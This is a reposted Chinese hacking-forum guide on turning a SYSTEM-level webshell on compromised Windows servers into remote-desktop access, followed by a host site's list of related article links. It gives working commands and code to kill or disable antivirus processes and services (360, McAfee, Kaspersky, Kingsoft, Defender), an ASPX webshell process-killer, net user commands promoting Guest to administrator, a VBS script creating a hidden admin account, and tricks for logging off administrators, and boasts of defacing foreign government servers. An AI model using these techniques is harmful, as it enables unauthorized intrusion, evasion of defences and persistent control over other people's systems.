Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389。总结原因有以下几点:
I.杀软篇
1,360杀毒软件
2,麦咖啡杀毒软件
3,卡巴斯基杀毒软件
4,其他杀毒软件或防护软件
II.策略篇
1,3389端口变更
2,莫名其妙无法添加账户
3,管理员限制篇
4,系统已达最大连接数处理

———————–I.
杀软篇—————————–
1,360杀毒软件
经常会在国内的一些服务器上遇到360杀毒和防护软件,如果使用webshell进行添加administrators账户时,360会阻止并提示管理员,导致添加失败。
那么如何突破360的限制?360不能完美的支持Server系统,也就是说,其实很简单。
阻止Webshell添加账户的主要是360主动防御,而结束了主动防御,360杀毒根本就是摆设。
那天手痒去百度搜了下blackbap.org这个关键字,居然出现在360论坛上,原来是Silic开发的php大马被某个服务器管理员举报到360论坛上去了。
大致就是这个网管把webshell传上去,说360查不出来,希望更新病毒库云云,结果360工程师看了以后说更新360就能杀到了,结果网管说更新了
还是杀不到。然后工程师说装什么什么的,网管说装了,还是杀不到,然后工程师就缩头乌龟了。可见360在server上面很垃圾,用小白的话说就是,请把
拿着打口水仗的钱多花在研发产品上吧。
好了,扯淡到此为止,突破方法也该千呼万唤始出来了。
先执行tasklist看一下进程列表,然后

 
 
 
 
 
 

Default

 
taskkill /im 进程名.exe /f
1
taskkill /im 进程名.exe /f

把主动防御结束
360相关进程如下:
360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe,这几个灭了,基本上360的阻碍就清除了,该加账户加账户,该pr就pr了。
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):

 
 
 
 
 
 

Default

 
protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write("<script>alert('Killed');location.href='?'</" + "script>");
ListBox1.Items.Clear();

}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
    protected void kp_Click(object sender, EventArgs e)
    {
    Process[] kp = Process.GetProcesses ();
    foreach ( Process kp1 in kp )
    if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
    {
    try
    {
    kp1.Kill();
    Response.Write("<script>alert('Killed');location.href='?'</" + "script>");
    ListBox1.Items.Clear();
 
    }
    catch (Exception x)
    {
    Response.Write(x.Message.ToString());
    Response.End();
    }
    }
    }

asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。
有些SYSYTEM权限却干不掉360,例如360tray.exe,360safe.exe,可以先query
user看看管理员状态,因为很可能是管理员登陆以后运行了图形界面没关闭,系统不执行taskkill
所以logoff把管理员踢了,然后360有的进程就自己灭了,这种情况多出现在2008的server系统上

2,麦咖啡杀毒软件
以前就谈过了关于如何绕过麦咖啡杀毒软件获得3389登陆权限的文章。

文章在这里:http://www.91ri.org/5867.html

那么完整一下过程就是,启用Guest账户,修改Guest用户的密码,添加Guest为administrators用户组。
经过测试,麦咖啡的防护进程恐怕是突破的,于是cmd命令如下:

 
 
 
 
 
 

Default

 
net user guest /active:yes //将guest用户启用
net user guest silic!&11133 //修改guest密码
net localgroup administrators guest /add //添加guest到管理员用户组中
1
2
3
    net user guest /active:yes          //将guest用户启用
    net user guest silic!&11133        //修改guest密码
    net localgroup administrators guest /add    //添加guest到管理员用户组中

这三条命令第二条或者第三条有时候可能不会显示命令执行成功,但是实际上只要是SYSTEM权限,就应该可以执行成功的,有无回显并不重要。

3,卡巴斯基
卡巴斯基的防护也是让人头疼的。关于突破卡巴斯基的方法,有很多。
调整系统时间,让卡巴的key失效,这就不说了。还有mkdir建立以非法字符“.”命名的文件夹,将pr等提权程序传进去。
SYSTEM突破卡巴的防御直接添加用户,恐怕不太容易,不过可以尝试,用taskkill结束进程的语句后面
& net user
add命令,同时执行结束进程和添加账户。
此方法尚未实践,但是理论上是可以的,因为卡巴不像麦咖啡,它可以直接被结束,但是立即就会重启进程。

4,金山防护软件
首先说KSafeSvc.exe, 当时不知道是什么玩意,
从文件名目测应该是个金山的东西。
这个进程即使是taskkill也是搞不定的…只要有它,net user
/add的时候,就算net.exe改名了,它也会弹出是否阻止的窗口(可能是它弹的,就算不是它弹的,也要干掉他才能添加)
但是有个命令叫ntsd,可以终结掉大部分进程,例如winlogon.exe
svchost.exe这些..
然后就ntsd -c q -p
PID结束了KSafeSvc.exe
然后说一下:金山毒霸+金山卫士+瑞星防火墙的组合
这个组合看似很牛逼,其实很傻逼。今天就遇到个system的php,上面就是金山毒霸+金山卫士+瑞星防火墙的组合
可以将如下代码保存到c:\windows\temp\a.vbs

 
 
 
 
 
 

Default

 
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","silic")
od.SetPassword "silic"
od.SetInfo
Set of=GetObject(os&"/silic",user)
oe.add os&"/silic"
1
2
3
4
5
6
7
8
9
    set wsnetwork=CreateObject("WSCRIPT.NETWORK")
    os="WinNT://"&wsnetwork.ComputerName
    Set ob=GetObject(os)
    Set oe=GetObject(os&"/Administrators,group")
    Set od=ob.Create("user","silic")
    od.SetPassword "silic"
    od.SetInfo
    Set of=GetObject(os&"/silic",user)
    oe.add os&"/silic"

然后用如下命令执行,就能得到账户为silic密码为silic的管理员账户了:

 
 
 
 
 
 

Default

 
cscript c:\windows\temp\a.vbs
1
    cscript c:\windows\temp\a.vbs

5,禁用服务法

 
 
 
 
 
 

Default

 
sc config 服务名 start= disabled
1
    sc config 服务名 start= disabled

有时候mysql或者mssql等等提权的时候,会发生杀软无法结束,导致提权失败的情况。
我们给杀软服务设置为禁用,重启服务器,杀毒防护服务就不能运行。就无阻畅通了,例如:

 
 
 
 
 
 

Default

 
sc config MsMpSvc start= disabled
1
    sc config MsMpSvc start= disabled

5,其他防护软件
见过很多非主流的防护软件,什么护卫盾啊,Safe3防篡改啊,还有各种类似程序,具体名字我忘了。
这些软件的突破方法和主流防护软件突破方法大致相同,结束进程,或者不使用添加账户,直接启用现有的Guest来突破监控,不赘述了
另外补充一种方法,就是将防护软件的服务从自动启动改为不启动,然后重启服务器。这种方法对绝大部分服务器有效。

——————————–II,策略篇—————————–
1,3389端口变更
进行3389添加账户前首先要知道3389到底开启没有。
目前只遇到过3389端口变更的例子,没见过不开启3389的例子。那为什么有的外网3389连不上呢?
原因很简单,3389端口变更了呗。找出来的方法再简单不过了netstat
-an查看所有开启的端口。

一个一个可疑的端口试未免太差劲了。netstat
-ano查看端口和使用端口的进程pid,然后Tasklist看一下有哪个svchost.exe进程的pid使用了端口

注意,是svchost.exe当中的某个。

2,莫名奇妙无法添加账户
什么是莫名奇妙?有些主机,Webshell是System权限,tasklist也看不到任何防护的进程,管理员也没在线,提权程序也添加不了,怎么搞?
有因必有果,这样的情况添加不了,多数是系统有组策略限制,通常限制的是密码最短长度。而这个组策略又多数是麦咖啡等防护软件设置上的。或者干脆就是装机的系统本身就GHO上了这个设置。
突破方法不用说了,把密码位数设置长一点就ok,原先密码是123456,现在改为1234abcd!@#$就过了
如果还是添加不上,可以尝试用vbs脚本来添加。

3,管理员限制
有些BT管理员很可恶,直接把c:\windows\system32的net.exe给删了或者换了,于是你直接net的时候会提示拒绝访问或者不是系统命令等等类似提示云云。
管理员看似很牛B,其实很傻逼,系统的net.exe没了,你自己传一个自己的net.exe就突破了。
当然,也有64位系统和你的程序不兼容的情况发生,他是64你就传64位的,很好搞。

4,达到最大连接限制
有时候添加了账户,但是连接提示最大连接数限制。管理员不在线,却占着线不让你上去,等管理员自己上线了,再把你删了。这种管理员够缺德的
对于这种上不去的,首先query
user查看在线的账户,然后看他的登陆ID,一般是0,最高不超过8,超过8说明服务器好久没重启了(这个没准的)

然后logoff
ID,就把对应ID的管理员踢掉了。然后就能登录了。
当然你在logoff的时候不要把自己logoff了,也不最好不要白天踢人。管理员在线被人踢掉的话,你懂的。—
—!
2011年和越南黑阔搞攻防切磋的时候,咱们网站的人就在人越南的gov服务器上乱搞,然后。。。咱网站的黑阔挂菊花聊天室,管理员就删啊删的,咱网站的
黑阔就logoff了管理员的账户,然后禁用和administrator。。。后来管理员就眼瞅着大家在菊花聊天室聊天,然后跑了半个小时去机房把网线
拔了。。。logoff命令真的很阴毒,尤其是对一些服务器不在本地的网站来说。。。

补充
有些SYSYTEM权限却干不掉360,例如360tray.exe,360safe.exe,可以先query
user看看管理员状态
很可能是管理员登陆以后运行了图形界面没关闭,系统不执行taskkill
所以logoff把管理员踢了,然后360有的进程就自己灭了
多出现在2008的server系统上

link:http://bbs.blackbap.org/thread-2331-1-1.html

91ri.org:我就不点评这篇文章了,一看就知道挺不错的,虽然老了点,但值得收藏,转载过来与大家分享。

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。

[集合]解决system权限3389无法添加的用户情况的更多相关文章

  1. Windows服务器SYSTEM权限Webshell无法添加3389账户情况突破总结

    转自:http://bbs.blackbap.org/thread-2331-1-1.html 近好多Silic的朋友在Windows下SYSTEM权限的php webshell下添加账户,但是却无法 ...

  2. Win10中解决SYSTEM权限获取,删Windows old

    一.[Windows.old]文件夹[右键]->[属性] 二.[安全]->[高级] 三.[更改] 四.添加[Everyone],点击[确定] 五.如下图,勾选两个选项,再[确定] 六.一路 ...

  3. Ubuntu添加新用户并给普通用户赋予root新权限

    添加新用户 首先用adduser命令添加普通用户: #adduser newusername 只有在root权限才可以添加新用户 修改密码: #passwd username 赋予root权限 方法1 ...

  4. WPF + Winform 解决管理员权限下无法拖放文件的问题

    wpf,winform混合解决管理员权限无法拖放文件的问题 学习自: https://zhuanlan.zhihu.com/p/343369663 https://zhuanlan.zhihu.com ...

  5. win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)

    今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站   先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 ...

  6. Android权限说明 system权限 root权限

    原文链接:http://blog.csdn.net/rockwupj/article/details/8618655 Android权限说明 Android系统是运行在Linux内核上的,Androi ...

  7. ubuntu添加新用户并添加管理员权限

    Ubuntu创建新用户并增加管理员权限  Family 2014-06-24 22:21:22 $是普通管员,#是系统管理员,在Ubuntu下,root用户默认是没有密码的,因此也就无法使用(据说是为 ...

  8. NPM全局安装软件包时解决EACCES权限错误

    NPM全局安装软件包时解决EACCES权限错误 Resolving EACCES permissions errors when installing packages globally npm WA ...

  9. ubuntu下解决wireshark权限问题

    wireshark要监控eth0,但是必须要root权限才行.但是,直接用root运行程序是相当危险,也是非常不方便的. 解决方法如下: 1.添加wireshark用户组 sudo groupadd ...

随机推荐

  1. mysql-Innodb事务隔离级别-repeatable read详解1

    经验总结: Python使用MySQLdb数据库后,如使用多线程,每个线程创建一个db链接,然后再各自创建一个游标cursor,其中第一个线程读一个表中数据为空,第二个写入该表一条数据并提交,第一个线 ...

  2. 问题:viewController不会调用dealloc()不会销毁

    问题 在调试程序时,我从ViewController A push进 ViewController B,在从B back时发现程序不会执行B里面的dealloc(),很诡异的问题,因为按理说此时点击b ...

  3. HDU4305 Lightning

    There are N robots standing on the ground (Don't know why. Don't know how). Suddenly the sky turns i ...

  4. 【CF1073D】Berland Fair(模拟)

    题意:初始有t元,每次从1开始买,从1到n依次有n个人,每个人的东西价格为a[i],该人依次能买就买,到n之后再回到1从头开始,问最后能买到的东西数量 n<=2e5,t<=1e18,a[i ...

  5. 容易混淆的某些Math方法说明

    1. Math.round 返回最接近的整数值,实际上就是我们说的对小数进行四舍五入. /** * 返回最接近参数的long */ static long round(double a) /** * ...

  6. 【Android】SQLite基本用法(转)

    在Android开发中SQLite起着很重要的作用,网上SQLite的教程有很多很多,不过那些教程大多数都讲得不是很全面.本人总结了一些SQLite的常用的方法,借着论坛的大赛,跟大家分享分享的.一. ...

  7. Current Sourcing (拉電流) and Current Sinking(灌電流)

    Current Sourcing and Sinking Current sourcing and sinking is often mentioned in relation to electron ...

  8. 定时执行rsync同步数据以及mysql备份

    需求:把机器A中的附件.图片等,备份到备份机B中.将数据库进行备份 附件备份 在A中,启动rsync服务,编辑/etc/xinetd.d/rsync文件,将其中的disable=yes改为disabl ...

  9. Delphi 半透明窗体,窗体以及控件透明度

    很简单了 现在,适用所有控件和窗体: delphi设置窗口透明 form1.AlphaBlend :=true; //透明form1.AlphaBlendValue :=180; //透明度form1 ...

  10. JSON Web Token的使用

    定义 JSON Web Token(JWT)是一个非常轻巧的规范.这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息. 适用场景 1.用于向Web应用传递一些非敏感信息.例如完成加好友.下 ...